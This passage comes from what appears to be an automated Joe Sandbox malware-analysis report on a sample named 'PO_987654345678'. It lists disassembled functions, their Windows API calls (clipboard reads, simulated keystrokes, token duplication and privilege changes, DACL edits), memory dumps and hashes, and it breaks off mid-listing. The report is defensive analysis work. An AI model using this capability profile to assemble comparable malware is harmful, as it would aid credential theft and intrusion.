                            • Part of subcall function 00F033A7: _wcslen.LIBCMT ref: 00F033AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: PathTemp_wcslen
                          • String ID:
                          • API String ID: 1974555822-0
                          • Opcode ID: 44d7f632748ef5959209a15bd06a788b428cc1c6f33d209f90f0f5375b493259
                          • Instruction ID: e4a15a91b835e50e57674250caa8068a3ee5c7489cb1f182dfe7a50b9a9b37a1
                          • Opcode Fuzzy Hash: 44d7f632748ef5959209a15bd06a788b428cc1c6f33d209f90f0f5375b493259
                          • Instruction Fuzzy Hash: BBC09B7550101E9FDB909790CCC9BBCB338FF00305F1040D5F60551090DE705A88BF11
                          Function 00F7744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F05745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F0949C,?,00008000), ref: 00F05773
                          • GetLastError.KERNEL32(00000002,00000000), ref: 00F776DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateErrorFileLast
                          • String ID:
                          • API String ID: 1214770103-0
                          • Opcode ID: d6ca5f364585c2ec9b95dc6a122d7bfecb1a3f5bc6e2a52603c9b066234d17c8
                          • Instruction ID: d41847138f9ceaa9c052addc33e849c68c89151f3509aa5e057b9be205284e04
                          • Opcode Fuzzy Hash: d6ca5f364585c2ec9b95dc6a122d7bfecb1a3f5bc6e2a52603c9b066234d17c8
                          • Instruction Fuzzy Hash: E88181306087019FCB14EF28C891B6AB7E1AF89354F08855DF8895B3D2DB74ED45EB92
                          Function 00F1FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: b1019eed9a786f379d452cb63394c80b92358448849418b5b90efecf71b0f3dd
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: 41310675A00109DBC718DF59E480AA9F7A1FF89310B6486A5E80ACF655D731EEC5EBC0
                          Function 00EB229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 00EB22B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                          • Instruction ID: b4ca8367f1ae96c45cd35438c243060a73983cd01654162b888ca0d370b9de4a
                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                          • Instruction Fuzzy Hash: 6CE0BF7494010EEFDB00EFA4D5496DE7BB4EF04311F1006A5FD05E7690DB309E548A62
                          Function 00EB22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 00EB22B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: ada8c2feeba3b8d484f687128010c1f6a534518d3465b5e5cce30b031dab9cc5
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: D8E0E67494010EDFDB00EFB4D5496DE7FB4EF04301F100265FD01E2280D6309D508A72

                          Non-executed Functions

                          Function 00F99576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F9961A
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F9965B
                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F9969F
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F996C9
                          • SendMessageW.USER32 ref: 00F996F2
                          • GetKeyState.USER32(00000011), ref: 00F9978B
                          • GetKeyState.USER32(00000009), ref: 00F99798
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F997AE
                          • GetKeyState.USER32(00000010), ref: 00F997B8
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F997E9
                          • SendMessageW.USER32 ref: 00F99810
                          • SendMessageW.USER32(?,00001030,?,00F97E95), ref: 00F99918
                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F9992E
                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F99941
                          • SetCapture.USER32(?), ref: 00F9994A
                          • ClientToScreen.USER32(?,?), ref: 00F999AF
                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F999BC
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F999D6
                          • ReleaseCapture.USER32 ref: 00F999E1
                          • GetCursorPos.USER32(?), ref: 00F99A19
                          • ScreenToClient.USER32(?,?), ref: 00F99A26
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F99A80
                          • SendMessageW.USER32 ref: 00F99AAE
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F99AEB
                          • SendMessageW.USER32 ref: 00F99B1A
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F99B3B
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F99B4A
                          • GetCursorPos.USER32(?), ref: 00F99B68
                          • ScreenToClient.USER32(?,?), ref: 00F99B75
                          • GetParent.USER32(?), ref: 00F99B93
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F99BFA
                          • SendMessageW.USER32 ref: 00F99C2B
                          • ClientToScreen.USER32(?,?), ref: 00F99C84
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F99CB4
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F99CDE
                          • SendMessageW.USER32 ref: 00F99D01
                          • ClientToScreen.USER32(?,?), ref: 00F99D4E
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F99D82
                            • Part of subcall function 00F19944: GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F99E05
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3429851547-4164748364
                          • Opcode ID: d5fc7b6cefcb34a95b481a4fb2df505aa653b8e95692bfb394a26eeb1026fc90
                          • Instruction ID: c76da07387a4150a7ee82d50b67af62583a0e5188bb6a216edfd3c30e7dac40a
                          • Opcode Fuzzy Hash: d5fc7b6cefcb34a95b481a4fb2df505aa653b8e95692bfb394a26eeb1026fc90
                          • Instruction Fuzzy Hash: E6429131508205AFEB24CF68CC44BAABBE5FF49320F15061EF659872A1D7B1D850EF92
                          Function 00F94873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00F948F3
                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00F94908
                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00F94927
                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00F9494B
                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00F9495C
                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00F9497B
                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00F949AE
                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00F949D4
                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00F94A0F
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00F94A56
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00F94A7E
                          • IsMenu.USER32(?), ref: 00F94A97
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F94AF2
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F94B20
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F94B94
                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00F94BE3
                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00F94C82
                          • wsprintfW.USER32 ref: 00F94CAE
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F94CC9
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00F94CF1
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F94D13
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F94D33
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00F94D5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                          • String ID: %d/%02d/%02d
                          • API String ID: 4054740463-328681919
                          • Opcode ID: f5c7bcb323275853f04946aa79f347266fb462df79036c92afbbd3dfcaeb3a83
                          • Instruction ID: 65f0c8931e8ec1f912d58ea652763c35d31445e46d0742dbbf8b8609f934d6db
                          • Opcode Fuzzy Hash: f5c7bcb323275853f04946aa79f347266fb462df79036c92afbbd3dfcaeb3a83
                          • Instruction Fuzzy Hash: 4912E032A00219ABFF248F24CC49FAE7BF8AF55724F14411AF519DB2E1D774A942EB50
                          Function 00F1F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F1F998
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5F474
                          • IsIconic.USER32(00000000), ref: 00F5F47D
                          • ShowWindow.USER32(00000000,00000009), ref: 00F5F48A
                          • SetForegroundWindow.USER32(00000000), ref: 00F5F494
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F4AA
                          • GetCurrentThreadId.KERNEL32 ref: 00F5F4B1
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F4BD
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F4CE
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F4D6
                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F5F4DE
                          • SetForegroundWindow.USER32(00000000), ref: 00F5F4E1
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F4F6
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F501
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F50B
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F510
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F519
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F51E
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F528
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F52D
                          • SetForegroundWindow.USER32(00000000), ref: 00F5F530
                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F5F557
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: b42eee3c1db7cf2c84b148c9e844e17e8ede189bcd80d4bbc2c88ffa87ad056b
                          • Instruction ID: ba87070fe6cfd0ad0c0f268d8f749f8dc877ab446a5eb9d3668659c35ebd61d8
                          • Opcode Fuzzy Hash: b42eee3c1db7cf2c84b148c9e844e17e8ede189bcd80d4bbc2c88ffa87ad056b
                          • Instruction Fuzzy Hash: 67319071A4031CBBEB216BB59C4AFBF7E6CEB44B50F140066FB04E61D1D6B15D00BAA1
                          Function 00F61201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6170D
                            • Part of subcall function 00F616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F6173A
                            • Part of subcall function 00F616C3: GetLastError.KERNEL32 ref: 00F6174A
                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F61286
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F612A8
                          • CloseHandle.KERNEL32(?), ref: 00F612B9
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F612D1
                          • GetProcessWindowStation.USER32 ref: 00F612EA
                          • SetProcessWindowStation.USER32(00000000), ref: 00F612F4
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F61310
                            • Part of subcall function 00F610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F611FC), ref: 00F610D4
                            • Part of subcall function 00F610BF: CloseHandle.KERNEL32(?,?,00F611FC), ref: 00F610E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                          • String ID: $default$winsta0
                          • API String ID: 22674027-1027155976
                          • Opcode ID: 6df1ccaa424b9423b7a1952a0d9fa4c0fbd41b2c5b31947b56d3ad548faca910
                          • Instruction ID: 9198996a89df04493cd15f22b3b56d82561a8fd6ffe16082def5b2f98aa3ba7c
                          • Opcode Fuzzy Hash: 6df1ccaa424b9423b7a1952a0d9fa4c0fbd41b2c5b31947b56d3ad548faca910
                          • Instruction Fuzzy Hash: 74819771D00209ABDF20DFA4DD49FEE7BB9FF05710F18412AF910A62A0CB759954EB61
                          Function 00F60B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61114
                            • Part of subcall function 00F610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61120
                            • Part of subcall function 00F610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F6112F
                            • Part of subcall function 00F610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61136
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F6114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F60BCC
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F60C00
                          • GetLengthSid.ADVAPI32(?), ref: 00F60C17
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00F60C51
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F60C6D
                          • GetLengthSid.ADVAPI32(?), ref: 00F60C84
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F60C8C
                          • HeapAlloc.KERNEL32(00000000), ref: 00F60C93
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F60CB4
                          • CopySid.ADVAPI32(00000000), ref: 00F60CBB
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F60CEA
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F60D0C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F60D1E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60D45
                          • HeapFree.KERNEL32(00000000), ref: 00F60D4C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60D55
                          • HeapFree.KERNEL32(00000000), ref: 00F60D5C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60D65
                          • HeapFree.KERNEL32(00000000), ref: 00F60D6C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F60D78
                          • HeapFree.KERNEL32(00000000), ref: 00F60D7F
                            • Part of subcall function 00F61193: GetProcessHeap.KERNEL32(00000008,00F60BB1,?,00000000,?,00F60BB1,?), ref: 00F611A1
                            • Part of subcall function 00F61193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F60BB1,?), ref: 00F611A8
                            • Part of subcall function 00F61193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F60BB1,?), ref: 00F611B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          • Opcode ID: 707a94f038b3b4daf3049cd6b5c933b624be474cbf204380f3e59b098597366d
                          • Instruction ID: 325cceee942ff1db32d0caea9b317a23f6231b61e391d624a853a81005c9f163
                          • Opcode Fuzzy Hash: 707a94f038b3b4daf3049cd6b5c933b624be474cbf204380f3e59b098597366d
                          • Instruction Fuzzy Hash: 6E715A72D0020AABDF10DFA5DC44FAFBBB8BF05310F144616E915E7191DB75A905EBA0
                          Function 00F7EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32(00F9CC08), ref: 00F7EB29
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F7EB37
                          • GetClipboardData.USER32(0000000D), ref: 00F7EB43
                          • CloseClipboard.USER32 ref: 00F7EB4F
                          • GlobalLock.KERNEL32(00000000), ref: 00F7EB87
                          • CloseClipboard.USER32 ref: 00F7EB91
                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00F7EBBC
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00F7EBC9
                          • GetClipboardData.USER32(00000001), ref: 00F7EBD1
                          • GlobalLock.KERNEL32(00000000), ref: 00F7EBE2
                          • GlobalUnlock.KERNEL32(00000000,?), ref: 00F7EC22
                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F7EC38
                          • GetClipboardData.USER32(0000000F), ref: 00F7EC44
                          • GlobalLock.KERNEL32(00000000), ref: 00F7EC55
                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F7EC77
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7EC94
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7ECD2
                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00F7ECF3
                          • CountClipboardFormats.USER32 ref: 00F7ED14
                          • CloseClipboard.USER32 ref: 00F7ED59
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                          • String ID:
                          • API String ID: 420908878-0
                          • Opcode ID: c25563e2b4b08d3e111008aed9fd759cb03e2d3e2279e0ee59f002b61b76dfe2
                          • Instruction ID: a4021306658f899782b55dfad4480fd3f351eda7c7ab20ba0f781c82dd3f8f3f
                          • Opcode Fuzzy Hash: c25563e2b4b08d3e111008aed9fd759cb03e2d3e2279e0ee59f002b61b76dfe2
                          • Instruction Fuzzy Hash: C861E2352042059FD310EF24DC84F2A7BA4AF88714F54859FF45A872A2DB31DD09FBA2
                          Function 00F7698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F769BE
                          • FindClose.KERNEL32(00000000), ref: 00F76A12
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F76A4E
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F76A75
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F76AB2
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F76ADF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                          • API String ID: 3830820486-3289030164
                          • Opcode ID: 30d1508b20834702f689fab3c9c6c755c72b30216ae89541a9ef45aa3c16e056
                          • Instruction ID: 7257719cd3eaf15b5b5280c1012d659d99c2eddde0a775496576e5bb7f20e658
                          • Opcode Fuzzy Hash: 30d1508b20834702f689fab3c9c6c755c72b30216ae89541a9ef45aa3c16e056
                          • Instruction Fuzzy Hash: 8FD16472908341AFC710EB64CC81EABB7ECAF88704F44491EF589D7191EB78DA44E762
                          Function 00F79642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F79663
